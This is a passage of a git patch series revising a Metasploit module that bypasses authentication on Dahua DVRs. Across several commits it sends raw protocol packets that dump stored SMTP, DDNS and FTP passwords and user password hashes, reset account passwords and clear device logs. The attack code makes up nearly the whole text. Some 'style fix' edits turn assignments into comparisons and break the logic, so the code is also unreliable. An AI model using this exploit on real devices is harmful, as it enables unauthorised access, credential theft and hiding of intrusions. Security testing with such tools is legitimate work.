"\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x32\x30\x2c\x32\x31" + +# "\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c" + +# "\x32\x37\x2c\x32\x38\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34" + +# "\x30\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36" + +# "\x2c\x34\x37\x2c\x34\x38\x2c\x34\x39\x2c\x35\x30\x2c\x35\x31\x2c" + +# "\x35\x32\x2c\x35\x33\x2c\x35\x34\x2c\x35\x35\x2c\x35\x36\x2c\x35" + +# "\x37\x2c\x35\x38\x2c\x35\x39\x2c\x36\x30\x3a\x3a\x31" +# +# u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +# u3 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +# u4 = "\xa6\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +# u5 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00" + +# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + +# userstring +# sock.put(u1) +# sock.get(1024) +# sock.put(u1) +# sock.get(1024) +# sock.put(u2) +# sock.get(1024) +# sock.put(u3) +# sock.get(1024) +# sock.put(u2) +# sock.get(1024) +# sock.put(u3) +# sock.get(1024) +# sock.put(u4) +# sock.get(1024) +# sock.put(groups) +# sock.get(1024) +# sock.put(users) +# sock.get(1024) +# sock.put(u5) +# sock.get(1024) +# sock.put(u2) +# sock.get(1024) +# sock.put(u3) +# sock.get(1024) +# sock.put(u4) +# sock.put(1024) +# sock.put(groups) +# sock.get(1024) +# sock.put(users) +# sock.put(1024) +# print_good("ADDED USER!: user #{datastore['USERNAME']}'s password is #{datastore['PASSWORD']}") +# +# else + end + + if (datastore['CLEAR_LOGS']) + sock.put(clear_logs) + sock.put(clear_logs2) + print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + end + disconnect() + end + end + + def report_hash(ip, rport, user, hash) + service_data = { + address: ip, + port: rport, + service_name: 'dahua_dvr', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + private_data: hash, + private_type: :nonreplayable_hash, + jtr_format: 'dahua_hash', + username: user, + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + service_data = { + address: ddns_server, + port: ddns_port, + service_name: 'ddns settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + private_data: ddns_pass, + private_type: :password, + username: ddn_user, + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_email_cred(mailserver, rport, muser, mpass) + service_data = { + address: mailserver, + port: rport, + service_name: 'email settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + private_data: mpass, + private_type: :password, + username: muser, + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + +end From afd1e432261a060ffd75c701c210e2aba5d8397a Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 17 Nov 2015 09:41:12 -0500 Subject: [PATCH 010/686] added rubocop fixes --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 140 +++++++++--------- 1 file changed, 69 insertions(+), 71 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 51d622265f..522e00cab0 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -63,14 +63,14 @@ class Metasploit3 < Msf::Auxiliary user8pwhash = "4WzwxXxM" #888888 user6pwhash = "sh15yfFM" #666666 useradminpwhash = "6QNMIQGe" #admin - connect() + connect sock.put(u1) data = sock.recv(8) - disconnect() + disconnect if data == dvr_resp print_good("DVR FOUND: @ #{rhost}:#{rport}!") report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "Dahua-based DVR") - connect() + connect sock.put(version) data = sock.get(1024) if data =~ /[\x00]{8,}([[:print:]]+)/ @@ -86,23 +86,23 @@ class Metasploit3 < Msf::Auxiliary end sock.put(email) - if data = sock.get(1024).split('&&') + if data == sock.get(1024).split('&&') print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ - if mailhost = $1.split(':') - print_status(" Server: #{mailhost[0]}") if !mailhost[0].nil? - print_status(" Destination Email: #{data[1]}") if !mailhost[1].nil? + if mailhost == $1.split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end - if !data[5].nil? and !data[6].nil? - print_good(" SMTP User: #{data[5]}") if !data[5].nil? - print_good(" SMTP Password: #{data[6]}") if !data[6].nil? + if !data[5].nil? && !data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? muser = "#{data[5]}" mpass = "#{data[6]}" mailserver = "#{mailhost[0]}" print_good("MailServer: #{mailserver}") #destemail = "#{data[1]}" if !mailhost[1].nil? - if !mailserver.to_s.strip.length == 0 and !muser.to_s.strip.length == 0 and !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, rport, muser, mpass) if ( !mailserver.nil? and !muser.nil? and !mpass.nil? ) + if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? end end end @@ -122,13 +122,13 @@ class Metasploit3 < Msf::Auxiliary ddns_user = "#{val[4]}" ddns_pass = "#{val[5]}" print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") if !val.nil? - print_status(" DDNS Server: #{ddns_server}") if !val.nil? - print_status(" DDNS Port: #{ddns_port}") if !val.nil? - print_status(" Domain: #{ddns_domain}") if !val.nil? - print_good(" Username: #{ddns_user}") if !val.nil? - print_good(" Password: #{ddns_pass}") if !val.nil? - if !ddns_server.to_s.strip.length == 0 and !ddns_port.to_s.strip.length == 0 and !ddns_user.to_s.strip.length == 0 and !ddns_pass.to_s.strip.length == 0 + print_status(" DDNS Service: #{ddns_service}") unless val.nil? + print_status(" DDNS Server: #{ddns_server}") unless val.nil? + print_status(" DDNS Port: #{ddns_port}") unless val.nil? + print_status(" Domain: #{ddns_domain}") unless val.nil? + print_good(" Username: #{ddns_user}") unless val.nil? + print_good(" Password: #{ddns_pass}") unless val.nil? + if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary end sock.put(nas) - if data = sock.get(1024) + if data == sock.get(1024) print_status("Nas Settings @ #{rhost}:#{rport}!:") server = '' port = '' @@ -152,26 +152,26 @@ class Metasploit3 < Msf::Auxiliary ftppass = $2 print_good(" FTP User: #{ftpuser}") print_good(" FTP Password: #{ftppass}") - if !ftpuser..to_s.strip.length == 0 and ftppass.to_s.strip.length == 0 - report_creds(:host => server, :port => port, :user => ftpuser, :pass => ftppass, :type => "FTP", - :active => true) if ( !server.nil? and !port.nil? and !ftpuser.nil? and !ftppass.nil? ) + if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 + report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", + active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? end end end sock.put(channels) data = sock.get(1024).split('&&') - disconnect() - if (data.length > 1) + disconnect + if data.length > 1 print_status("Camera Channels @ #{rhost}:#{rport}!:") data.each_with_index { |val, index| print_status(" #{index+1}:#{val[/([[:print:]]+)/]}") } end - connect() + connect sock.put(users) - if data = sock.get(1024).split('&&') + if data == sock.get(1024).split('&&') print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each { |val| @@ -187,32 +187,31 @@ class Metasploit3 < Msf::Auxiliary # Write the vulnerability to the database #unless reported_vuln report_vuln( - :host => rhost, - :port => rport, - :proto => 'tcp', - :sname => 'dvr', - :name => 'Dahua Authentication Password Hash Exposure', - :info => "Obtained password hash for user #{username}: #{md5hash}", - :refs => self.references + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{username}: #{md5hash}", + refs: :references ) } end sock.put(groups) - if data = sock.get(1024).split('&&') + if data == sock.get(1024).split('&&') print_status("User Groups: @ #{rhost}:#{rport}!") data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end - if (datastore['RESET']) - userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + - ":" + datastore['PASSWORD'] - u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + + if datastore['RESET'] + userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring sock.put(u1) @@ -222,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary sock.put(u3) data = sock.get(1024) sock.put(u1) - if data = sock.get(1024) + if data == sock.get(1024) print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") end # elsif (datastore['ACTION'] == "DELETE") @@ -297,89 +296,88 @@ class Metasploit3 < Msf::Auxiliary # else end - if (datastore['CLEAR_LOGS']) + if datastore['CLEAR_LOGS'] sock.put(clear_logs) sock.put(clear_logs2) print_good("LOGS CLEARED! @ #{rhost}:#{rport}") end - disconnect() + disconnect end end - def report_hash(ip, rport, user, hash) - service_data = { + def report_hash(ip, rport, user, hash) + service_data = { address: ip, port: rport, service_name: 'dahua_dvr', protocol: 'tcp', workspace_id: myworkspace_id - } + } - credential_data = { - module_fullname: self.fullname, + credential_data = { + module_fullname: :fullname, origin_type: :service, private_data: hash, private_type: :nonreplayable_hash, jtr_format: 'dahua_hash', - username: user, - }.merge(service_data) + username: user + }.merge(service_data) - login_data = { + login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + }.merge(service_data) create_credential_login(login_data) end def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - service_data = { + service_data = { address: ddns_server, port: ddns_port, service_name: 'ddns settings', protocol: 'tcp', workspace_id: myworkspace_id - } + } - credential_data = { - module_fullname: self.fullname, + credential_data = { + module_fullname: :fullname, origin_type: :service, private_data: ddns_pass, private_type: :password, - username: ddn_user, - }.merge(service_data) + username: ddns_user + }.merge(service_data) - login_data = { + login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + }.merge(service_data) create_credential_login(login_data) end def report_email_cred(mailserver, rport, muser, mpass) - service_data = { + service_data = { address: mailserver, port: rport, service_name: 'email settings', protocol: 'tcp', workspace_id: myworkspace_id - } + } - credential_data = { - module_fullname: self.fullname, + credential_data = { + module_fullname: :fullname, origin_type: :service, private_data: mpass, private_type: :password, - username: muser, - }.merge(service_data) + username: muser + }.merge(service_data) - login_data = { + login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + }.merge(service_data) create_credential_login(login_data) - end - + end end From f499b822cdfd645d2cd067d29f4e3281d766a2b1 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 17 Nov 2015 10:30:50 -0500 Subject: [PATCH 011/686] added more rubocop fixes, still testing issue with RHOSTS --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 297 +++++++++--------- 1 file changed, 144 insertions(+), 153 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 522e00cab0..14bc93f41c 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -32,198 +32,189 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) usercount = 0 - u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" - version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + + version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + + nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + - "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + + channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" + + groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + + users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + + sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" + + clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + + clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" user = "root" pass = " w" - user8pwhash = "4WzwxXxM" #888888 - user6pwhash = "sh15yfFM" #666666 - useradminpwhash = "6QNMIQGe" #admin + # user8pwhash = "4WzwxXxM" #888888 + # user6pwhash = "sh15yfFM" #666666 + # useradminpwhash = "6QNMIQGe" #admin connect sock.put(u1) data = sock.recv(8) disconnect if data == dvr_resp - print_good("DVR FOUND: @ #{rhost}:#{rport}!") - report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "Dahua-based DVR") - connect - sock.put(version) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - ver = $1 - print_status("Version: #{ver} @ #{rhost}:#{rport}!") - end + print_good("DVR FOUND: @ #{rhost}:#{rport}!") + report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") + connect + sock.put(version) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + ver = $1 + print_status("Version: #{ver} @ #{rhost}:#{rport}!") + end - sock.put(sn) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - serial = $1 - print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") - end + sock.put(sn) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + serial = $1 + print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") + end - sock.put(email) - if data == sock.get(1024).split('&&') - print_status("Email Settings: @ #{rhost}:#{rport}!") - if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ - if mailhost == $1.split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? - end - if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? - muser = "#{data[5]}" - mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - print_good("MailServer: #{mailserver}") - #destemail = "#{data[1]}" if !mailhost[1].nil? - if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? - end - end - end - end + sock.put(email) + if data == sock.get(1024).split('&&') + print_status("Email Settings: @ #{rhost}:#{rport}!") + if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ + if mailhost == $1.split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + end + if !data[5].nil? && !data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + print_good("MailServer: #{mailserver}") + # destemail = "#{data[1]}" if !mailhost[1].nil? + if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? + end + end + end + end sock.put(ddns) - if data = sock.get(1024) - data = data.split(/&&[0-1]&&/) - data.each_with_index { - |val, index| - if index > 0 - val = val.split("&&") - ddns_service = "#{val[0]}" - ddns_server = "#{val[1]}" - ddns_port = "#{val[2]}" - ddns_domain = "#{val[3]}" - ddns_user = "#{val[4]}" - ddns_pass = "#{val[5]}" - print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") unless val.nil? - print_status(" DDNS Server: #{ddns_server}") unless val.nil? - print_status(" DDNS Port: #{ddns_port}") unless val.nil? - print_status(" Domain: #{ddns_domain}") unless val.nil? - print_good(" Username: #{ddns_user}") unless val.nil? - print_good(" Password: #{ddns_pass}") unless val.nil? - if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 + if data == sock.get(1024) + data = data.split(/&&[0-1]&&/) + data.each_with_index { |val, index| + if index > 0 + val = val.split("&&") + ddns_service = "#{val[0]}" + ddns_server = "#{val[1]}" + ddns_port = "#{val[2]}" + ddns_domain = "#{val[3]}" + ddns_user = "#{val[4]}" + ddns_pass = "#{val[5]}" + print_status("DDNS Settings @ #{rhost}:#{rport}!:") + print_status(" DDNS Service: #{ddns_service}") unless val.nil? + print_status(" DDNS Server: #{ddns_server}") unless val.nil? + print_status(" DDNS Port: #{ddns_port}") unless val.nil? + print_status(" Domain: #{ddns_domain}") unless val.nil? + print_good(" Username: #{ddns_user}") unless val.nil? + print_good(" Password: #{ddns_pass}") unless val.nil? + if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 - report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - end - end - } + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + end + end + } end sock.put(nas) if data == sock.get(1024) - print_status("Nas Settings @ #{rhost}:#{rport}!:") - server = '' - port = '' - if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ - server = $1.unpack('C*').join('.') - port = $2.unpack('S') - print_status(" Nas Server #{server}") - print_status(" Nas Port: #{port}") - end - if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ - ftpuser = $1 - ftppass = $2 - print_good(" FTP User: #{ftpuser}") - print_good(" FTP Password: #{ftppass}") - if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 - report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", - active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? - end - end + print_status("Nas Settings @ #{rhost}:#{rport}!:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = $1.unpack('C*').join('.') + port = $2.unpack('S') + print_status(" Nas Server #{server}") + print_status(" Nas Port: #{port}") + end + if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ + ftpuser = $1 + ftppass = $2 + print_good(" FTP User: #{ftpuser}") + print_good(" FTP Password: #{ftppass}") + if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 + report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", + active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? + end + end end sock.put(channels) data = sock.get(1024).split('&&') disconnect if data.length > 1 - print_status("Camera Channels @ #{rhost}:#{rport}!:") - data.each_with_index { - |val, index| - print_status(" #{index+1}:#{val[/([[:print:]]+)/]}") - } + print_status("Camera Channels @ #{rhost}:#{rport}!:") + data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } end connect sock.put(users) if data == sock.get(1024).split('&&') - print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") - data.each { - |val| - usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" - value = pass.split(":") - username = "#{value[1]}" - md5hash = "#{value[2]}" - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") - # Write the dahua hash to the database - hash = "#{rhost} #{username}:$dahua$#{md5hash}" - report_hash(ip, rport, user, hash) - # Write the vulnerability to the database - #unless reported_vuln - report_vuln( - host: rhost, - port: rport, - proto: 'tcp', - sname: 'dvr', - name: 'Dahua Authentication Password Hash Exposure', - info: "Obtained password hash for user #{username}: #{md5hash}", - refs: :references - ) - } + print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") + data.each { |val| + usercount += 1 + pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" + value = pass.split(":") + username = "#{value[1]}" + md5hash = "#{value[2]}" + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # Write the dahua hash to the database + hash = "#{rhost} #{username}:$dahua$#{md5hash}" + report_hash(ip, rport, user, hash) + # Write the vulnerability to the database + # unless reported_vuln + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{username}: #{md5hash}", + refs: :references + ) + } end sock.put(groups) if data == sock.get(1024).split('&&') - print_status("User Groups: @ #{rhost}:#{rport}!") - data.each { - |val| - print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") - } + print_status("User Groups: @ #{rhost}:#{rport}!") + data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end - if datastore['RESET'] - userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] - u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + - userstring - sock.put(u1) - data = sock.get(1024) - sock.put(u2) - data = sock.get(1024) - sock.put(u3) - data = sock.get(1024) - sock.put(u1) - if data == sock.get(1024) - print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") - end + if datastore['RESET'] + userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring + sock.put(u1) + # data = sock.get(1024) + sock.put(u2) + # data = sock.get(1024) + sock.put(u3) + data = 